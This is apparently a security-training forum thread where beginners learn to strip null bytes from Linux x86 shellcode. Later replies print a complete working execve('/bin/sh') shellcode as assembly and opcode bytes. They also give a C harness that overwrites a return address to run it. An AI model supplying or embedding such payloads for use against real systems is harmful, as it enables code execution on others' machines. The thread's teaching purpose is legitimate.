Understanding how to get rid of null bytes in my code?

Viewing 15 reply threads
  • Author
    • #3090

      Hi all,
      I have a question about the shellcode I am learning to write:
        * I created a C file and compiled it to an executable, but when I ran
          “objdump -d” on the compiled file I saw null bytes in the code. So I compiled the C file to assembly
        with gcc, but I always fail to get rid of the null bytes in the generated assembly.
        Here is the assembly code, unmodified:

              .file  "shell.c"
              .section        .rodata
      .LC0:
              .string "/bin/sh"
              .text
      .globl main
              .type  main, @function
      main:
              leal    4(%esp), %ecx
              andl    $-16, %esp
              pushl  -4(%ecx)
              pushl  %ebp
              movl    %esp, %ebp
              pushl  %ecx
              subl    $36, %esp
              movl    $.LC0, -12(%ebp)
              movl    $0, -8(%ebp)
              movl    -12(%ebp), %edx
              movl    $0, 8(%esp)
              leal    -12(%ebp), %eax
              movl    %eax, 4(%esp)
              movl    %edx, (%esp)
              call    execve
              movl    $0, (%esp)
              call    exit
              .size  main, .-main
              .ident  "GCC: (GNU) 4.1.2 20061115 (prerelease) (SUSE Linux)"
              .section        .note.GNU-stack,"",@progbits

      Thanks a lot in advance, and sorry for this stupid question (still a noob at asm  :-[ ),

      Thank you,  🙂

    • #20880

      I’m not an asm programmer, but there is a very good description of this problem in the book Sockets, Shellcode, Porting and Coding by James C. Foster. Not much help if you don’t have the book, I know, but it’s a good resource for learning to write shellcode.


    • #20881


      I haven’t spent much time playing with custom shellcode yet, so this may not work. However, the first thing I’d look at is msfencode from the Metasploit Framework. I think you should be able to run your compiled shellcode through it with a list of bad characters to remove null bytes and any other characters that would break functionality.

      Hopefully you can either prove or disprove this theory, or someone with more experience can provide further guidance, good luck.
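
      As a rough illustration of what "encoding away bad characters" means, here is a minimal sketch of a single-byte XOR encoder in C. It is not msfencode's actual algorithm, and the function names find_xor_key and xor_buffer are made up for this example. A real encoder also has to prepend a small null-free decoder stub, which is left out here.

```c
#include <stddef.h>
#include <stdint.h>

/* Return the smallest non-zero key k such that no byte of buf, XORed
 * with k, becomes 0x00. Returns 0 if every candidate key is ruled out. */
uint8_t find_xor_key(const uint8_t *buf, size_t len)
{
    int seen[256] = {0};

    for (size_t i = 0; i < len; i++)
        seen[buf[i]] = 1;           /* b ^ k == 0 exactly when b == k */

    for (int k = 1; k < 256; k++)
        if (!seen[k])
            return (uint8_t)k;
    return 0;
}

/* XOR every byte in place; applying it twice restores the input. */
void xor_buffer(uint8_t *buf, size_t len, uint8_t key)
{
    for (size_t i = 0; i < len; i++)
        buf[i] ^= key;
}
```

      For the bytes b8 11 00 00 00 the first usable key is 0x01, because 0x01 does not occur in the input, so no encoded byte can come out as zero.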


    • #20882

      Hi Nubie – I’m also new at writing shellcode, but it is my understanding that you should look at the actual opcodes to determine where the null byte is coming from.

      Use objdump -d on the compiled file and identify which instructions contain null bytes – for example:

      80483a5:      b8 11 00 00 00          mov    $0x11,%eax

      This has three null bytes, but you can fix it by using the low 8-bit register instead:
      mov $0x11, %al

      This removes the null bytes from the shellcode and has the same effect, provided the rest of eax is already zero.
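
      If you would rather not hunt through the objdump output by eye, a few lines of C can do the search. This is only a sketch; count_null_bytes is a name invented for this example, and you would paste in your own opcode bytes.

```c
#include <stddef.h>
#include <stdio.h>

/* Count the 0x00 bytes in an opcode buffer and print where they are. */
size_t count_null_bytes(const unsigned char *code, size_t len)
{
    size_t count = 0;

    for (size_t i = 0; i < len; i++) {
        if (code[i] == 0x00) {
            printf("null byte at offset %zu\n", i);
            count++;
        }
    }
    return count;
}
```

      Fed the bytes b8 11 00 00 00 it reports three nulls at offsets 2, 3 and 4; fed b0 11 (the mov into %al) it reports none.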

      Does this assist at all?

    • #20883

      NickFnord’s answer is correct. I checked my book 😉 Putting small values into the extended registers like eax leads to null byte padding. For example…

      mov eax,1

      is assembled as if you had written

      mov eax,0x00000001

      This is because the eax register is 4 bytes wide, so the immediate value moved into it is encoded as 4 bytes. The way to load a small value without the padding is to use the 8-bit version, al.

      mov al,1

      Set the register to zero before doing this by xoring the 32-bit register with itself…

      xor eax,eax
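
      To make the byte counts concrete, here is a small C sketch that writes out the machine code for both variants. The helper names emit_mov_eax_imm32 and emit_xor_then_mov_al are invented for this example; the opcodes themselves (B8 for mov eax,imm32, 31 C0 for xor eax,eax, B0 for mov al,imm8) are the standard x86 encodings.

```c
#include <stddef.h>
#include <stdint.h>

/* Emit "mov eax, imm32": opcode B8 followed by the value as four
 * little-endian bytes. Returns the number of bytes written (5). */
size_t emit_mov_eax_imm32(uint8_t *out, uint32_t imm)
{
    out[0] = 0xb8;
    out[1] = (uint8_t)(imm & 0xff);
    out[2] = (uint8_t)((imm >> 8) & 0xff);
    out[3] = (uint8_t)((imm >> 16) & 0xff);
    out[4] = (uint8_t)((imm >> 24) & 0xff);
    return 5;
}

/* Emit "xor eax, eax" (31 C0) followed by "mov al, imm8" (B0 ib).
 * Returns the number of bytes written (4). */
size_t emit_xor_then_mov_al(uint8_t *out, uint8_t imm)
{
    out[0] = 0x31;
    out[1] = 0xc0;
    out[2] = 0xb0;
    out[3] = imm;
    return 4;
}
```

      For the value 1 the first helper produces b8 01 00 00 00 and the second produces 31 c0 b0 01, so the replacement is both null-free and one byte shorter. It only stays null-free while the 8-bit value itself is non-zero.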


    • #20884

      Hi all,

      Thanks a lot for all your replies, and sorry for only replying now. I had
      internet connection problems ( :'( in my country it is hard to find a good, cheap provider). In theory I understand the code I compiled above.
      But is it true that compiling the same code on different PCs with different operating systems gives different results? I used SUSE and Cygwin to compile the code to assembly and the results look different; if I read carefully, even the null bytes are in different places ???.
      I am still trying to get rid of the nulls on both systems, because I want to fully understand this ;D. Thanks a lot again for your kind help,
      and sorry for this post  🙂

    • #20885

      don’t say sorry for posting!  there’s no such thing as a stupid question.

      yes, your code may compile differently under different operating systems and definitely with different compilers, but it should all be functionally the same.

      the general process for writing shellcode goes:

      1. write your code in a high level language
      2. compile to assembly
      3. take only the assembly component that you need from it
      4. assemble the cut-down assembly to a binary
      5. disassemble resulting binary to identify null bytes
      6. re-work the assembly until you remove null bytes (see above posts for general idea of how to remove null bytes).

      you may need to engage in some jiggery-pokery to reserve space for strings such as /bin/sh etc.

      if you’re serious about getting into this, I highly recommend getting “The Shellcoder’s Handbook” – the entire book is dedicated to writing shellcode.

      I’ll post an excerpt from it detailing the above steps later on if you like (don’t have the book in front of me right now).

    • #20886

      Thank you NickFnord for your support and your help  :),
      and I would be really glad if you could help me.

      nubie  🙂

    • #20887

      Hi all,
      My question is about line 16 of the code I posted, the one with $.LC0. When I searched for LC0 I found it is just a symbol/label for an address, and with objdump I can see the address is
      0x8048500, which contains a null byte. I need some help/advice on getting rid of that null in the address.
      Also, is my understanding of the replies correct? If an instruction only loads zero, for example:
          mov ebx, 0 (in the shellcode this contains null bytes)
          then the replacement is: xor ebx, ebx
      And what about movl $0,(%esp) (as shown in my code above)?
      Would the replacement be something like: xor %esp,(%esp)

      Thank you, and sorry if my language is confusing :-[,


    • #20888

      Hi again,

      I was going to try to type out an excerpt from The Shellcoder’s Handbook, but it is multiple pages long.  This was a Good Thing because it forced me to understand it prior to posting here 🙂  I haven’t done so previously because I’m focusing on the reversing course that I’m doing at the moment.

      Anyway, In summary:

      We want to spawn a shell by calling

      execve ("/bin/sh", argv, NULL);    (where argv is the array {"/bin/sh", NULL})

      So first we write what we want to do in C (this is code from the book):

      #include <unistd.h>

      int main()
      {
        char *happy[2];
        happy[0] = "/bin/sh";
        happy[1] = NULL;
        execve (happy[0], happy, NULL);
      }

      Next we disassemble it and take a look at the execve call (this is cut down to show the parameters and the call itself, but it’s good to look at the entire function):

        804e15b:      8b 5d 08                mov    0x8(%ebp),%ebx
        804e165:      8b 4d 0c                mov    0xc(%ebp),%ecx
        804e168:      8b 55 10                mov    0x10(%ebp),%edx
        804e16b:      b8 0b 00 00 00          mov    $0xb,%eax
        804e170:      cd 80                  int    $0x80

      As you can see, int 0x80 performs the syscall whose number is stored in eax (execve is 0xb) and takes three arguments, passed in via the registers ebx, ecx and edx (the Linux i386 system call convention).

      The problem with simply taking the disassembly and removing null bytes is that there are a lot of hard-coded addresses in there – which, as you’ve found, are difficult to deal with.

      So we need a way to make it so we can reference everything via relative addressing.

      The simplest way to do this is to have the shellcode discover its own address at run time, using the stack.  The idea is that we start the shellcode off with a call and then go from there.

      Here’s the assembly code from the book (sorry for the intel syntax):

      section .text

        global _start

      _start:
        jmp short gotocall

      shellcode:
        pop esi
        xor eax, eax
        mov byte [esi + 7], al
        lea ebx, [esi]
        mov dword [esi + 8], ebx
        mov dword [esi + 12], eax
        mov al, 0x0b
        mov ebx, esi
        lea ecx, [esi + 8]
        lea edx, [esi + 12]
        int 0x80

      gotocall:
        call shellcode
        db '/bin/shABBBBCCCC'

      When the call instruction is executed, the address of whatever immediately follows it (the return address) is pushed onto the stack.  Here that is the address of our string.  We’ve included some padding in the db (define byte) directive in order to make room for the extra parameters in our call to execve.

      Next we pop esi to get the address of our ‘/bin/shABBBBCCCC’ string into the ESI register – now we can reference everything as offsets from ESI.

      xor eax, eax

      sets eax to zero.

      mov byte [esi + 7], al

      writes a null byte at offset 7 of our string, over the “A”, which terminates ‘/bin/sh’

      lea ebx, [esi]

      places the address of our string into ebx

      mov dword [esi + 8], ebx

      stores that address at esi+8, over the “BBBB”.  our data should now look like: ‘/bin/sh.PPPPCCCC’  with the “.” representing a null and “PPPP” the four address bytes

      mov dword [esi + 12], eax

      This stores four null bytes (eax was xor’d previously) over the “CCCC”, the last part of our data
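
      If it helps to see the result of those three stores, the sketch below replays them in C on a copy of the 16-byte data block. The function name patch_data_block is invented for this example, and the base address is just a stand-in for whatever value pop esi would produce at run time.

```c
#include <stdint.h>

/* Replay the three stores on a copy of the 16-byte data block.
 * base stands in for the 32-bit address that "pop esi" would yield. */
void patch_data_block(uint8_t block[16], uint32_t base)
{
    block[7] = 0x00;                            /* mov byte [esi+7], al    */

    for (int i = 0; i < 4; i++) {
        /* mov dword [esi+8], ebx : address stored little-endian */
        block[8 + i] = (uint8_t)(base >> (8 * i));
        /* mov dword [esi+12], eax : four zero bytes */
        block[12 + i] = 0x00;
    }
}
```

      Starting from ‘/bin/shABBBBCCCC’ and an example base of 0x08048081, the block ends up as ‘/bin/sh’, a null, the bytes 81 80 04 08, and four nulls. That is exactly the layout execve wants: a terminated path, then a two-entry argument array whose last entry is a null pointer.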

      Now we set up the registers ready for the interrupt 0x80:

      mov al, 0x0b
      mov ebx, esi
      lea ecx, [esi + 8]
      lea edx, [esi + 12]

      At this point – EAX will contain 00 00 00 0b
      EBX will contain a pointer to the string ‘/bin/sh’
      ECX will contain a pointer to the argument array: the pointer to ‘/bin/sh’ followed by a null pointer
      And EDX will contain a pointer to that null pointer (an empty environment)

      Then we execute the interrupt.

      int 0x80

      So you merely have to assemble that code and extract the opcodes.

      hope that helps –

    • #20889

      Hi NickFnord,

      thanks for the tutorial above. It makes me wonder which approach to choose:
      writing null-free code in pure assembly from the start, or fixing the null bytes later
      once the code has been generated ???. I still have to learn both, but I would like some opinions
      about this.

      Thank’s a lot . 🙂


    • #20890

      I’m by no means an expert, just learning like yourself, so I may be very wrong (please someone stop me if I am!). But I’m almost certain that, for the most part, when writing shellcode yourself you’re not going to be able to simply manipulate the existing assembly to remove the nulls. You’re going to have to analyse the code that you want to execute, break it down into its essential components and then rewrite it as efficiently as you can.

      Even when you do a simple exit as below:

      > vi exitcode.c
      #include <stdlib.h>
      int main(void) { exit(0); }

      > gcc -static -o exitcode exitcode.c

      > objdump -d ./exitcode > exitcode.dump

      0804e12c :
      804e12c:      8b 5c 24 04            mov    0x4(%esp),%ebx
      804e130:      b8 fc 00 00 00          mov    $0xfc,%eax
      804e135:      cd 80                  int    $0x80
      804e137:      b8 01 00 00 00          mov    $0x1,%eax
      804e13c:      cd 80                  int    $0x80

      you’re still going to have to figure out what is being loaded into ebx (0 apparently).

      and determine whether you need both int 0x80 calls. (one is exit_group() and one is exit())

      The resulting assembly would be

      section .text

        global _start

      _start:
        xor ebx, ebx
        xor eax, eax
        mov al, 1
        int 0x80

      which doesn’t really bear a lot of resemblance to the original disassembly

    • #20891

      Hi NickFnord,

      Thanks for your opinion. It makes things clearer and makes me more comfortable about writing shellcode  :).

      Thanks again for your help  ;D.


    • #20892

      nubie, have you tried the asm code NickFnord posted in reply #9? I’ve been trying to run it but it keeps segfaulting on me. NickFnord, any thoughts? I’m running ubuntu 8.10, and also tried debian 4 and fedora 10 with the same result, if that matters.

    • #20893

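      the idea is that you assemble the asm, objdump it, extract the opcodes and then test it in a C program.  Run on its own, the code segfaults because it writes into its own .text section, which is mapped read-only.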

      bt shellcode # objdump -d ./shell

      ./shell:     file format elf32-i386

      Disassembly of section .text:

      08048060 <_start>:
      8048060:       eb 1a                   jmp    804807c <gotocall>

      08048062 <shellcode>:
      8048062:       5e                      pop    %esi
      8048063:       31 c0                   xor    %eax,%eax
      8048065:       88 46 07                mov    %al,0x7(%esi)
      8048068:       8d 1e                   lea    (%esi),%ebx
      804806a:       89 5e 08                mov    %ebx,0x8(%esi)
      804806d:       89 46 0c                mov    %eax,0xc(%esi)
      8048070:       b0 0b                   mov    $0xb,%al
      8048072:       89 f3                   mov    %esi,%ebx
      8048074:       8d 4e 08                lea    0x8(%esi),%ecx
      8048077:       8d 56 0c                lea    0xc(%esi),%edx
      804807a:       cd 80                   int    $0x80

      0804807c <gotocall>:
      804807c:       e8 e1 ff ff ff          call   8048062 <shellcode>
      8048081:       2f                      das
      8048082:       62 69 6e                bound  %ebp,0x6e(%ecx)
      8048085:       2f                      das
      8048086:       73 68                   jae    80480f0
      8048088:       41                      inc    %ecx
      8048089:       42                      inc    %edx
      804808a:       42                      inc    %edx
      804808b:       42                      inc    %edx
      804808c:       42                      inc    %edx
      804808d:       43                      inc    %ebx
      804808e:       43                      inc    %ebx
      804808f:       43                      inc    %ebx
      8048090:       43                      inc    %ebx
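
      The jmp and call operands in the listing above are relative displacements, and they are the reason the code jumps forward first and then calls backward. The sketch below recomputes them in C; the function names jmp_short_disp and call_rel32_disp are invented for this example, and the addresses are taken from the listing.

```c
#include <stdint.h>

/* rel8 displacement for a 2-byte "jmp short" located at insn_addr:
 * measured from the address of the next instruction. */
int8_t jmp_short_disp(uint32_t insn_addr, uint32_t target)
{
    return (int8_t)(target - (insn_addr + 2));
}

/* rel32 displacement for a 5-byte "call" located at insn_addr:
 * measured from the address of the next instruction. */
int32_t call_rel32_disp(uint32_t insn_addr, uint32_t target)
{
    return (int32_t)(target - (insn_addr + 5));
}
```

      The short jump from 0x8048060 to 0x804807c gives 0x1a, which fits in one byte. The backward call from 0x804807c to 0x8048062 gives -31, encoded as e1 ff ff ff, so the sign extension fills the upper bytes with ff instead of 00. A forward call over the same distance would have a small positive displacement and therefore three null bytes.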

      take the opcodes and stick into a test framework:

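      char shellcode[] =
          "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c"
          "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff"
          "/bin/shABBBBCCCC";
      int main()
      {
        int *ret;
        ret = (int *)&ret + 2;   /* point at main's saved return address */
        (*ret) = (int)shellcode; /* overwrite it so main returns into the shellcode */
      }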

      and that should run fine.
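
      Before running anything, a quick sanity check is to compare strlen() against sizeof: if the only zero byte is the terminator the compiler adds, the two differ by exactly one. The sketch below assumes the bytes from the objdump listing above; is_null_free is a name invented for this example, and the code only inspects the bytes, it does not execute them.

```c
#include <stddef.h>
#include <string.h>

/* Opcode bytes copied from the objdump listing, then the data block. */
static const char shellcode[] =
    "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c"
    "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff"
    "/bin/shABBBBCCCC";

/* Returns 1 when the only 0x00 byte is the terminator the compiler
 * appends, i.e. strlen() sees the whole array. */
int is_null_free(const char *code, size_t size_with_terminator)
{
    return strlen(code) == size_with_terminator - 1;
}
```

      Calling is_null_free(shellcode, sizeof shellcode) returns 1 for these 49 bytes. An array that starts with b8 0b 00 00 00 would fail the check, because strlen() stops at the first embedded null.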

      edit:  here’s a good article I found helpful too:


    • #20894

      thanks for the reply NickFnord. the article is a good read too.


Copyright ©2021 Caendra, Inc.
